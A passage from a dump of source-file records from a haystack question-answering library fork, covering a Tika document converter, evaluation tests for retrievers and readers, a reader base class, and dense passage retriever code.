remove_empty_lines: Optional[bool] = None,\n remove_header_footer: Optional[bool] = None,\n valid_languages: Optional[List[str]] = None,\n ):\n \"\"\"\n :param tika_url: URL of the Tika server\n :param remove_numeric_tables: This option uses heuristics to remove numeric rows from the tables.\n The tabular structures in documents might be noise for the reader model if it\n does not have table parsing capability for finding answers. However, tables\n may also have long strings that could possible candidate for searching answers.\n The rows containing strings are thus retained in this option.\n :param remove_whitespace: strip whitespaces before or after each line in the text.\n :param remove_empty_lines: remove more than two empty lines in the text.\n :param remove_header_footer: use heuristic to remove footers and headers across different pages by searching\n for the longest common string. This heuristic uses exact matches and therefore\n works well for footers like \"Copyright 2019 by XXX\", but won't detect \"Page 3 of 4\"\n or similar.\n :param valid_languages: validate languages from a list of languages specified in the ISO 639-1\n (https://en.wikipedia.org/wiki/ISO_639-1) format.\n This option can be used to add test for encoding errors. If the extracted text is\n not one of the valid languages, then it might likely be encoding error resulting\n in garbled text.\n \"\"\"\n ping = requests.get(tika_url)\n if ping.status_code != 200:\n raise Exception(f\"Apache Tika server is not reachable at the URL '{tika_url}'. 
To run it locally\"\n f\"with Docker, execute: 'docker run -p 9998:9998 apache/tika:1.24.1'\")\n self.tika_url = tika_url\n super().__init__(\n remove_numeric_tables=remove_numeric_tables,\n remove_whitespace=remove_whitespace,\n remove_empty_lines=remove_empty_lines,\n remove_header_footer=remove_header_footer,\n valid_languages=valid_languages,\n )\n\n def extract_pages(self, file_path: Path) -> Tuple[List[str], Optional[Dict[str, Any]]]:\n \"\"\"\n :param file_path: Path of file to be converted.\n\n :return: a list of pages and the extracted meta data of the file.\n \"\"\"\n parsed = tikaparser.from_file(file_path.as_posix(), self.tika_url, xmlContent=True)\n parser = TikaXHTMLParser()\n parser.feed(parsed[\"content\"])\n\n cleaned_pages = []\n # TODO investigate title of document appearing in the first extracted page\n for page in parser.pages:\n lines = page.splitlines()\n cleaned_lines = []\n for line in lines:\n words = line.split()\n digits = [word for word in words if any(i.isdigit() for i in word)]\n\n # remove lines having > 40% of words as digits AND not ending with a period(.)\n if self.remove_numeric_tables:\n if words and len(digits) / len(words) > 0.4 and not line.strip().endswith(\".\"):\n logger.debug(f\"Removing line '{line}' from {file_path}\")\n continue\n\n if self.remove_whitespace:\n line = line.strip()\n\n cleaned_lines.append(line)\n\n page = \"\\n\".join(cleaned_lines)\n\n # always clean up empty lines:\n page = re.sub(r\"\\n\\n+\", \"\\n\\n\", page)\n\n cleaned_pages.append(page)\n\n if self.valid_languages:\n document_text = \"\".join(cleaned_pages)\n if not self.validate_language(document_text):\n logger.warning(\n f\"The language for {file_path} is not one of {self.valid_languages}. The file may not have \"\n f\"been decoded in the correct text format.\"\n )\n\n if self.remove_header_footer:\n cleaned_pages, header, footer = self.find_and_remove_header_footer(\n cleaned_pages, n_chars=300, n_first_pages_to_ignore=1, n_last_pages_to_ignore=1\n )\n logger.info(f\"Removed header '{header}' and footer '{footer}' in {file_path}\")\n\n return cleaned_pages, parsed[\"metadata\"]\n"
},
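A hypothetical usage of the `TikaConverter` above; it assumes a Tika server is already running locally (e.g. via the Docker command from the error message) and that the sample PDF path exists:

```python
from pathlib import Path
from haystack.indexing.file_converters.tika import TikaConverter

converter = TikaConverter(remove_numeric_tables=True, valid_languages=["en"])
pages, meta = converter.extract_pages(file_path=Path("samples/pdf/sample.pdf"))
print(f"{len(pages)} pages, content type: {meta.get('Content-Type')}")
```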
{
"alpha_fraction": 0.690861165523529,
"alphanum_fraction": 0.7070298790931702,
"avg_line_length": 47.22881317138672,
"blob_id": "c51e7347a510bddf8d5edc4310b659def5f82c2d",
"content_id": "836dc6f938951bcb24bc512d8ebec1a52fbcf9fb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5690,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 118,
"path": "/test/test_eval.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom haystack.database.base import BaseDocumentStore\nfrom haystack.retriever.sparse import ElasticsearchRetriever\nfrom haystack.finder import Finder\n\n\ndef test_add_eval_data(document_store):\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/small.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n\n assert document_store.get_document_count(index=\"test_eval_document\") == 87\n assert document_store.get_label_count(index=\"test_feedback\") == 1214\n\n # test documents\n docs = document_store.get_all_documents(index=\"test_eval_document\")\n assert docs[0].text[:10] == \"The Norman\"\n assert docs[0].meta[\"name\"] == \"Normans\"\n assert len(docs[0].meta.keys()) == 1\n\n # test labels\n labels = document_store.get_all_labels(index=\"test_feedback\")\n assert labels[0].answer == \"France\"\n assert labels[0].no_answer == False\n assert labels[0].is_correct_answer == True\n assert labels[0].is_correct_document == True\n assert labels[0].question == 'In what country is Normandy located?'\n assert labels[0].origin == \"gold_label\"\n assert labels[0].offset_start_in_doc == 159\n\n # check combination\n assert labels[0].document_id == docs[0].id\n start = labels[0].offset_start_in_doc\n end = start+len(labels[0].answer)\n assert docs[0].text[start:end] == \"France\"\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"reader\", [\"farm\"], indirect=True)\ndef test_eval_reader(reader, document_store: BaseDocumentStore):\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n # eval reader\n reader_eval_results = reader.eval(document_store=document_store, label_index=\"test_feedback\",\n doc_index=\"test_eval_document\", device=\"cpu\")\n assert reader_eval_results[\"f1\"] > 0.65\n assert reader_eval_results[\"f1\"] < 0.67\n assert reader_eval_results[\"EM\"] == 0.5\n assert reader_eval_results[\"top_n_accuracy\"] == 1.0\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"document_store\", [\"elasticsearch\"], indirect=True)\[email protected](\"open_domain\", [True, False])\ndef test_eval_elastic_retriever(document_store: BaseDocumentStore, open_domain):\n retriever = ElasticsearchRetriever(document_store=document_store)\n\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n\n # eval retriever\n results = retriever.eval(top_k=1, label_index=\"test_feedback\", doc_index=\"test_eval_document\", open_domain=open_domain)\n assert results[\"recall\"] == 1.0\n assert results[\"map\"] == 1.0\n\n # clean up\n 
document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n\n\[email protected](\"document_store\", [\"elasticsearch\"], indirect=True)\[email protected](\"reader\", [\"farm\"], indirect=True)\ndef test_eval_finder(document_store: BaseDocumentStore, reader):\n retriever = ElasticsearchRetriever(document_store=document_store)\n finder = Finder(reader=reader, retriever=retriever)\n\n # add eval data (SQUAD format)\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")\n document_store.add_eval_data(filename=\"samples/squad/tiny.json\", doc_index=\"test_eval_document\", label_index=\"test_feedback\")\n assert document_store.get_document_count(index=\"test_eval_document\") == 2\n\n # eval finder\n results = finder.eval(label_index=\"test_feedback\", doc_index=\"test_eval_document\", top_k_retriever=1, top_k_reader=5)\n assert results[\"retriever_recall\"] == 1.0\n assert results[\"retriever_map\"] == 1.0\n assert abs(results[\"reader_topk_f1\"] - 0.66666) < 0.001\n assert abs(results[\"reader_topk_em\"] - 0.5) < 0.001\n assert abs(results[\"reader_topk_accuracy\"] - 1) < 0.001\n assert results[\"reader_top1_f1\"] <= results[\"reader_topk_f1\"]\n assert results[\"reader_top1_em\"] <= results[\"reader_topk_em\"]\n assert results[\"reader_top1_accuracy\"] <= results[\"reader_topk_accuracy\"]\n\n # batch eval finder\n results_batch = finder.eval_batch(label_index=\"test_feedback\", doc_index=\"test_eval_document\", top_k_retriever=1,\n top_k_reader=5)\n assert results_batch[\"retriever_recall\"] == 1.0\n assert results_batch[\"retriever_map\"] == 1.0\n assert results_batch[\"reader_top1_f1\"] == results[\"reader_top1_f1\"]\n assert results_batch[\"reader_top1_em\"] == results[\"reader_top1_em\"]\n assert results_batch[\"reader_topk_accuracy\"] == results[\"reader_topk_accuracy\"]\n\n # clean up\n document_store.delete_all_documents(index=\"test_eval_document\")\n document_store.delete_all_documents(index=\"test_feedback\")"
},
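A condensed sketch of the evaluation workflow the tests in the record above exercise, assuming a running Elasticsearch instance; the reader checkpoint and index names are illustrative, and the FARMReader import path is assumed from the repo layout:

from haystack.database.elasticsearch import ElasticsearchDocumentStore
from haystack.finder import Finder
from haystack.reader.farm import FARMReader
from haystack.retriever.sparse import ElasticsearchRetriever

# Load SQuAD-formatted gold data into dedicated document and label indices
document_store = ElasticsearchDocumentStore(index="eval_document", label_index="feedback")
document_store.add_eval_data(filename="samples/squad/tiny.json",
                             doc_index="eval_document", label_index="feedback")

retriever = ElasticsearchRetriever(document_store=document_store)
reader = FARMReader(model_name_or_path="deepset/roberta-base-squad2")  # any extractive QA checkpoint
finder = Finder(reader=reader, retriever=retriever)

# End-to-end metrics combine retriever recall/mAP with reader F1/EM, as asserted in the tests
metrics = finder.eval(label_index="feedback", doc_index="eval_document",
                      top_k_retriever=1, top_k_reader=5)
print(metrics["retriever_recall"], metrics["reader_topk_f1"])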
{
"alpha_fraction": 0.6327977180480957,
"alphanum_fraction": 0.6346880793571472,
"avg_line_length": 45,
"blob_id": "5c056747f76b0d4b89134ece885fbf58110db355",
"content_id": "84788d4e8296413cc89bbb396b70c71f724e73a6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2116,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 46,
"path": "/haystack/reader/base.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom scipy.special import expit\nfrom abc import ABC, abstractmethod\nfrom typing import List, Optional, Sequence\n\nfrom haystack.database.base import Document\n\n\nclass BaseReader(ABC):\n return_no_answers: bool\n\n @abstractmethod\n def predict(self, question: str, documents: List[Document], top_k: Optional[int] = None):\n pass\n\n @abstractmethod\n def predict_batch(self, question_doc_list: List[dict], top_k_per_question: Optional[int] = None,\n batch_size: Optional[int] = None):\n pass\n\n @staticmethod\n def _calc_no_answer(no_ans_gaps: Sequence[float], best_score_answer: float):\n # \"no answer\" scores and positive answers scores are difficult to compare, because\n # + a positive answer score is related to one specific document\n # - a \"no answer\" score is related to all input documents\n # Thus we compute the \"no answer\" score relative to the best possible answer and adjust it by\n # the most significant difference between scores.\n # Most significant difference: a model switching from predicting an answer to \"no answer\" (or vice versa).\n # No_ans_gap is a list of this most significant difference per document\n no_ans_gaps = np.array(no_ans_gaps)\n max_no_ans_gap = np.max(no_ans_gaps)\n # all passages \"no answer\" as top score\n if (np.sum(no_ans_gaps < 0) == len(no_ans_gaps)): # type: ignore\n no_ans_score = best_score_answer - max_no_ans_gap # max_no_ans_gap is negative, so it increases best pos score\n else: # case: at least one passage predicts an answer (positive no_ans_gap)\n no_ans_score = best_score_answer - max_no_ans_gap\n\n no_ans_prediction = {\"answer\": None,\n \"score\": no_ans_score,\n \"probability\": float(expit(np.asarray(no_ans_score) / 8)), # just a pseudo prob for now\n \"context\": None,\n \"offset_start\": 0,\n \"offset_end\": 0,\n \"document_id\": None,\n \"meta\": None,}\n return no_ans_prediction, max_no_ans_gap\n"
},
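A worked example of the "no answer" scoring implemented in _calc_no_answer above, with made-up numbers to show how the gap adjusts the best positive score:

import numpy as np
from scipy.special import expit

no_ans_gaps = np.array([-2.5, -0.7, 1.3])  # illustrative per-document gaps
best_score_answer = 10.0

max_no_ans_gap = np.max(no_ans_gaps)                 # 1.3: at least one passage prefers an answer
no_ans_score = best_score_answer - max_no_ans_gap    # 10.0 - 1.3 = 8.7
probability = float(expit(np.asarray(no_ans_score) / 8))  # logistic squash, ~0.75
print(no_ans_score, probability)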
{
"alpha_fraction": 0.5832365155220032,
"alphanum_fraction": 0.5870617628097534,
"avg_line_length": 50.7593994140625,
"blob_id": "e94cea3d1a5087dff16d546f636a654ff063408d",
"content_id": "889a87fe860882d30a37b74a6d5ad48e6ccf10c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20654,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 399,
"path": "/haystack/retriever/dense.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import logging\nfrom typing import Type, List, Union, Tuple, Optional\nimport torch\nimport numpy as np\nfrom pathlib import Path\n\nfrom farm.infer import Inferencer\n\nfrom haystack.database.base import Document, BaseDocumentStore\nfrom haystack.database.elasticsearch import ElasticsearchDocumentStore\nfrom haystack.retriever.base import BaseRetriever\nfrom haystack.retriever.sparse import logger\n\nfrom haystack.retriever.dpr_utils import DPRContextEncoder, DPRQuestionEncoder, DPRConfig, DPRContextEncoderTokenizer, \\\n DPRQuestionEncoderTokenizer\n\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass DensePassageRetriever(BaseRetriever):\n \"\"\"\n Retriever that uses a bi-encoder (one transformer for query, one transformer for passage).\n See the original paper for more details:\n Karpukhin, Vladimir, et al. (2020): \"Dense Passage Retrieval for Open-Domain Question Answering.\"\n (https://arxiv.org/abs/2004.04906).\n \"\"\"\n\n def __init__(self,\n document_store: BaseDocumentStore,\n query_embedding_model: str,\n passage_embedding_model: str,\n max_seq_len: int = 256,\n use_gpu: bool = True,\n batch_size: int = 16,\n embed_title: bool = True,\n remove_sep_tok_from_untitled_passages: bool = True,\n model_type: str = \"dpr\",\n pad_to_max_length: bool = True,\n ):\n \"\"\"\n Init the Retriever incl. the two encoder models from a local or remote model checkpoint.\n The checkpoint format matches huggingface transformers' model format\n\n :Example:\n\n # remote model from FAIR\n >>> DensePassageRetriever(document_store=your_doc_store,\n query_embedding_model=\"facebook/dpr-question_encoder-single-nq-base\",\n passage_embedding_model=\"facebook/dpr-ctx_encoder-single-nq-base\",\n use_gpu=True)\n # or from local path\n >>> DensePassageRetriever(document_store=your_doc_store,\n query_embedding_model=\"local-path/query-checkpoint\",\n passage_embedding_model=\"local-path/ctx-checkpoint\",\n use_gpu=True)\n :param document_store: An instance of DocumentStore from which to retrieve documents.\n :param query_embedding_model: Local path or remote name of question encoder checkpoint. The format equals the\n one used by hugging-face transformers' modelhub models\n Currently available remote names: \"facebook/dpr-question_encoder-single-nq-base\"\n :param passage_embedding_model: Local path or remote name of passage encoder checkpoint. The format equals the\n one used by hugging-face transformers' modelhub models\n Currently available remote names: \"facebook/dpr-ctx_encoder-single-nq-base\"\n :param max_seq_len: Longest length of each sequence\n :param use_gpu: Whether to use gpu or not\n :param batch_size: Number of questions or passages to encode at once\n :param embed_title: Whether to concatenate title and passage to a text pair that is then used to create the embedding \n :param remove_sep_tok_from_untitled_passages: If embed_title is true, there are different strategies to deal with documents that don't have a title.\n True => Embed passage as single text, similar to embed_title = False (i.e [CLS] passage_tok1 ... [SEP])\n False => Embed passage as text pair with empty title (i.e. [CLS] [SEP] passage_tok1 ... 
[SEP])\n :param pad_to_max_length: Whether to add padding or not \n \"\"\"\n\n self.document_store = document_store\n self.batch_size = batch_size\n self.max_seq_len = max_seq_len\n\n if use_gpu and torch.cuda.is_available():\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n self.embed_title = embed_title\n self.remove_sep_tok_from_untitled_passages = remove_sep_tok_from_untitled_passages\n\n self.model_type = model_type.upper()\n # Init & Load Encoders\n\n #1. Load Tokenizer\n #NB: I will use always the same Tokenizer (even though I will switch between checkpoints)\n self.query_tokenizer = DPRQuestionEncoderTokenizer.from_pretrained(\"facebook/dpr-question_encoder-single-nq-base\")\n self.passage_tokenizer = DPRContextEncoderTokenizer.from_pretrained(\"facebook/dpr-ctx_encoder-single-nq-base\")\n\n #2. Load Model\n valid_model_types = [\"DPR\",\"ORQA\",\"REALM\"]\n\n if self.model_type in valid_model_types:\n self.query_encoder = DPRQuestionEncoder.from_pretrained(query_embedding_model).to(self.device)\n self.passage_encoder = DPRContextEncoder.from_pretrained(passage_embedding_model).to(self.device)\n else:\n raise NotImplementedError \n \n self.pad_to_max_length=pad_to_max_length\n \n self.debug_mode=False #Set it from outside (TMP)\n \n logger.info(f\"BiEncoder implementation with {self.model_type}\")\n\n def retrieve(self, query: str, filters: dict = None, top_k: int = 10, index: str = None) -> List[Document]:\n if index is None:\n index = self.document_store.index\n\n tic = time.time()\n query_emb = self.embed_queries(texts=[query])\n toc = time.time()\n \n if self.debug_mode:\n print(f\"Question embedding time={toc-tic}\")\n\n tic = time.time()\n documents = self.document_store.query_by_embedding(query_emb=query_emb[0], top_k=top_k, filters=filters, index=index)\n toc= time.time()\n if self.debug_mode:\n print(f\"ES query time={toc-tic}\")\n\n \n return documents\n\n def embed_queries(self, texts: List[str]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of queries using the query encoder\n\n :param texts: queries to embed\n :return: embeddings, one per input queries\n \"\"\"\n queries = [self._normalize_query(q) for q in texts]\n result = self._generate_batch_predictions(texts=queries, model=self.query_encoder,\n tokenizer=self.query_tokenizer,\n batch_size=self.batch_size)\n return result\n\n def embed_passages(self, docs: List[Document]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of passages using the passage encoder\n\n :param docs: List of Document objects used to represent documents / passages in a standardized way within Haystack.\n :return: embeddings of documents / passages shape (batch_size, embedding_dim)\n \"\"\"\n texts = [d.text for d in docs]\n titles = None\n if self.embed_title:\n titles = [d.meta[\"name\"] if d.meta and \"name\" in d.meta else \"\" for d in docs]\n\n result = self._generate_batch_predictions(texts=texts, titles=titles,\n model=self.passage_encoder,\n tokenizer=self.passage_tokenizer,\n batch_size=self.batch_size)\n return result\n\n def _normalize_query(self, query: str) -> str:\n if query[-1] == '?':\n query = query[:-1]\n return query\n\n def _tensorizer(self, tokenizer: Union[DPRQuestionEncoderTokenizer, DPRContextEncoderTokenizer],\n text: List[str],\n title: Optional[List[str]] = None,\n add_special_tokens: bool = True):\n \"\"\"\n Creates tensors from text sequences\n :Example:\n >>> ctx_tokenizer = DPRContextEncoderTokenizer.from_pretrained()\n >>> 
dpr_object._tensorizer(tokenizer=ctx_tokenizer, text=passages, title=titles)\n\n :param tokenizer: An instance of DPRQuestionEncoderTokenizer or DPRContextEncoderTokenizer.\n :param text: list of text sequences to be tokenized\n :param title: optional list of titles associated with each text sequence\n :param add_special_tokens: boolean for whether to encode special tokens in each sequence\n\n Returns:\n token_ids: list of token ids from vocabulary\n token_type_ids: list of token type ids\n attention_mask: list of indices specifying which tokens should be attended to by the encoder\n \"\"\"\n\n # combine titles with passages only if some titles are present with passages\n if self.embed_title and title:\n final_text = [tuple((title_, text_)) for title_, text_ in zip(title, text)] #type: Union[List[Tuple[str, ...]], List[str]]\n else:\n final_text = text\n out = tokenizer.batch_encode_plus(final_text, add_special_tokens=add_special_tokens, truncation=True,\n max_length=self.max_seq_len,\n pad_to_max_length=self.pad_to_max_length)\n\n token_ids = torch.tensor(out['input_ids']).to(self.device)\n token_type_ids = torch.tensor(out['token_type_ids']).to(self.device)\n attention_mask = torch.tensor(out['attention_mask']).to(self.device)\n return token_ids, token_type_ids, attention_mask\n\n def _remove_sep_tok_from_untitled_passages(self, titles, ctx_ids_batch, ctx_attn_mask):\n \"\"\"\n removes [SEP] token from untitled samples in batch. For batches which has some untitled passages, remove [SEP]\n token used to segment titles and passage from untitled samples in the batch\n (Official DPR code do not encode [SEP] tokens in untitled passages)\n\n :Example:\n # Encoding passages with 'embed_title' = True. 1st passage is titled, 2nd passage is untitled\n >>> texts = ['Aaron Aaron ( or ; \"\"Ahärôn\"\") is a prophet, high priest, and the brother of Moses in the Abrahamic religions.',\n 'Democratic Republic of the Congo to the south. Angola\\'s capital, Luanda, lies on the Atlantic coast in the northwest of the country.'\n ]\n >> titles = [\"0\", '']\n >>> token_ids, token_type_ids, attention_mask = self._tensorizer(self.passage_tokenizer, text=texts, title=titles)\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[0]]\n ['[CLS]', '0', '[SEP]', 'aaron', 'aaron', '(', 'or', ';', ....]\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[1]]\n ['[CLS]', '[SEP]', 'democratic', 'republic', 'of', 'the', ....]\n >>> new_ids, new_attn = self._remove_sep_tok_from_untitled_passages(titles, token_ids, attention_mask)\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[0]]\n ['[CLS]', '0', '[SEP]', 'aaron', 'aaron', '(', 'or', ';', ....]\n >>> [self.passage_tokenizer.ids_to_tokens[tok.item()] for tok in token_ids[1]]\n ['[CLS]', 'democratic', 'republic', 'of', 'the', 'congo', ...]\n\n :param titles: list of titles for each sample\n :param ctx_ids_batch: tensor of shape (batch_size, max_seq_len) containing token indices\n :param ctx_attn_mask: tensor of shape (batch_size, max_seq_len) containing attention mask\n\n Returns:\n ctx_ids_batch: tensor of shape (batch_size, max_seq_len) containing token indices with [SEP] token removed\n ctx_attn_mask: tensor of shape (batch_size, max_seq_len) reflecting the ctx_ids_batch changes\n \"\"\"\n # Skip [SEP] removal if passage encoder not bert model\n if self.passage_encoder.ctx_encoder.base_model_prefix != 'bert_model':\n logger.warning(\"Context encoder is not a BERT model. 
Skipping removal of [SEP] tokens\")\n return ctx_ids_batch, ctx_attn_mask\n\n # create a mask for titles in the batch\n titles_mask = torch.tensor(list(map(lambda x: 0 if x == \"\" else 1, titles))).to(self.device)\n\n # get all untitled passage indices\n no_title_indices = torch.nonzero(1 - titles_mask).squeeze(-1)\n\n # remove [SEP] token index for untitled passages and add 1 pad to compensate\n ctx_ids_batch[no_title_indices] = torch.cat((ctx_ids_batch[no_title_indices, 0].unsqueeze(-1),\n ctx_ids_batch[no_title_indices, 2:],\n torch.tensor([self.passage_tokenizer.pad_token_id]).expand(len(no_title_indices)).unsqueeze(-1).to(self.device)),\n dim=1)\n # Modify attention mask to reflect [SEP] token removal and pad addition in ctx_ids_batch\n ctx_attn_mask[no_title_indices] = torch.cat((ctx_attn_mask[no_title_indices, 0].unsqueeze(-1),\n ctx_attn_mask[no_title_indices, 2:],\n torch.tensor([self.passage_tokenizer.pad_token_id]).expand(len(no_title_indices)).unsqueeze(-1).to(self.device)),\n dim=1)\n\n return ctx_ids_batch, ctx_attn_mask\n\n def _generate_batch_predictions(self,\n texts: List[str],\n model: torch.nn.Module,\n tokenizer: Union[DPRQuestionEncoderTokenizer, DPRContextEncoderTokenizer],\n titles: Optional[List[str]] = None, #useful only for passage embedding with DPR!\n batch_size: int = 16) -> List[Tuple[object, np.array]]:\n n = len(texts)\n total = 0\n results = []\n for batch_start in range(0, n, batch_size):\n # create batch of titles only for passages\n ctx_title = None\n if self.embed_title and titles:\n ctx_title = titles[batch_start:batch_start + batch_size]\n\n # create batch of text\n ctx_text = texts[batch_start:batch_start + batch_size]\n\n # tensorize the batch\n ctx_ids_batch, _, ctx_attn_mask = self._tensorizer(tokenizer, text=ctx_text, title=ctx_title)\n ctx_seg_batch = torch.zeros_like(ctx_ids_batch).to(self.device)\n\n # remove [SEP] token from untitled passages in batch\n if self.embed_title and self.remove_sep_tok_from_untitled_passages and ctx_title:\n ctx_ids_batch, ctx_attn_mask = self._remove_sep_tok_from_untitled_passages(ctx_title,\n ctx_ids_batch,\n ctx_attn_mask)\n\n with torch.no_grad():\n out = model(input_ids=ctx_ids_batch, attention_mask=ctx_attn_mask, token_type_ids=ctx_seg_batch)\n # TODO revert back to when updating transformers\n # out = out.pooler_output\n out = out[0]\n out = out.cpu()\n\n total += ctx_ids_batch.size()[0]\n\n results.extend([\n (out[i].view(-1).numpy())\n for i in range(out.size(0))\n ])\n\n if total % 10 == 0:\n logger.info(f'Embedded {total} / {n} texts')\n\n return results\n\nclass EmbeddingRetriever(BaseRetriever):\n def __init__(\n self,\n document_store: BaseDocumentStore,\n embedding_model: str,\n use_gpu: bool = True,\n model_format: str = \"farm\",\n pooling_strategy: str = \"reduce_mean\",\n emb_extraction_layer: int = -1,\n ):\n \"\"\"\n :param document_store: An instance of DocumentStore from which to retrieve documents.\n :param embedding_model: Local path or name of model in Hugging Face's model hub. Example: 'deepset/sentence_bert'\n :param use_gpu: Whether to use gpu or not\n :param model_format: Name of framework that was used for saving the model. 
Options: 'farm', 'transformers', 'sentence_transformers'\n :param pooling_strategy: Strategy for combining the embeddings from the model (for farm / transformers models only).\n Options: 'cls_token' (sentence vector), 'reduce_mean' (sentence vector),\n reduce_max (sentence vector), 'per_token' (individual token vectors)\n :param emb_extraction_layer: Number of layer from which the embeddings shall be extracted (for farm / transformers models only).\n Default: -1 (very last layer).\n \"\"\"\n self.document_store = document_store\n self.model_format = model_format\n self.embedding_model = embedding_model\n self.pooling_strategy = pooling_strategy\n self.emb_extraction_layer = emb_extraction_layer\n\n logger.info(f\"Init retriever using embeddings of model {embedding_model}\")\n if model_format == \"farm\" or model_format == \"transformers\":\n self.embedding_model = Inferencer.load(\n embedding_model, task_type=\"embeddings\", extraction_strategy=self.pooling_strategy,\n extraction_layer=self.emb_extraction_layer, gpu=use_gpu, batch_size=4, max_seq_len=512, num_processes=0\n )\n\n elif model_format == \"sentence_transformers\":\n from sentence_transformers import SentenceTransformer\n\n # pretrained embedding models coming from: https://github.com/UKPLab/sentence-transformers#pretrained-models\n # e.g. 'roberta-base-nli-stsb-mean-tokens'\n if use_gpu:\n device = \"cuda\"\n else:\n device = \"cpu\"\n self.embedding_model = SentenceTransformer(embedding_model, device=device)\n else:\n raise NotImplementedError\n\n def retrieve(self, query: str, filters: dict = None, top_k: int = 10, index: str = None) -> List[Document]:\n if index is None:\n index = self.document_store.index\n query_emb = self.embed(texts=[query])\n documents = self.document_store.query_by_embedding(query_emb=query_emb[0], filters=filters,\n top_k=top_k, index=index)\n return documents\n\n def embed(self, texts: Union[List[str], str]) -> List[np.array]:\n \"\"\"\n Create embeddings for each text in a list of texts using the retrievers model (`self.embedding_model`)\n :param texts: texts to embed\n :return: list of embeddings (one per input text). Each embedding is a list of floats.\n \"\"\"\n\n # for backward compatibility: cast pure str input\n if type(texts) == str:\n texts = [texts] # type: ignore\n assert type(texts) == list, \"Expecting a list of texts, i.e. create_embeddings(texts=['text1',...])\"\n\n if self.model_format == \"farm\" or self.model_format == \"transformers\":\n emb = self.embedding_model.inference_from_dicts(dicts=[{\"text\": t} for t in texts]) # type: ignore\n emb = [(r[\"vec\"]) for r in emb]\n elif self.model_format == \"sentence_transformers\":\n # text is single string, sentence-transformers needs a list of strings\n # get back list of numpy embedding vectors\n emb = self.embedding_model.encode(texts) # type: ignore\n # cast to float64 as float32 can cause trouble when serializing for ES\n emb = [(r.astype('float64')) for r in emb]\n return emb\n\n def embed_queries(self, texts: List[str]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of queries. For this Retriever type: The same as calling .embed()\n\n :param texts: queries to embed\n :return: embeddings, one per input queries\n \"\"\"\n return self.embed(texts)\n\n def embed_passages(self, docs: List[Document]) -> List[np.array]:\n \"\"\"\n Create embeddings for a list of passages. 
For this Retriever type: The same as calling .embed()\n\n :param texts: passage to embed\n :return: embeddings, one per input passage\n \"\"\"\n texts = [d.text for d in docs]\n\n return self.embed(texts)\n"
},
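A minimal sketch of wiring the DensePassageRetriever above to a document store, assuming a running Elasticsearch instance with documents already written (index name illustrative); the model names and update_embeddings() call are taken from the records in this dump:

from haystack.database.elasticsearch import ElasticsearchDocumentStore
from haystack.retriever.dense import DensePassageRetriever

document_store = ElasticsearchDocumentStore(index="document",
                                            embedding_field="embedding", embedding_dim=768)
retriever = DensePassageRetriever(document_store=document_store,
                                  query_embedding_model="facebook/dpr-question_encoder-single-nq-base",
                                  passage_embedding_model="facebook/dpr-ctx_encoder-single-nq-base",
                                  use_gpu=False)

# Compute and store passage embeddings (single batch over all docs), then retrieve densely
document_store.update_embeddings(retriever)
docs = retriever.retrieve(query="Who wrote Hamlet?", top_k=5)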
{
"alpha_fraction": 0.6765676736831665,
"alphanum_fraction": 0.6765676736831665,
"avg_line_length": 40.7931022644043,
"blob_id": "0a44e13fae34e852642c2010ed325a594c424e7e",
"content_id": "b9946141314becd81daf5058a5510530f20d316e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 29,
"path": "/haystack/indexing/file_converters/docx.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
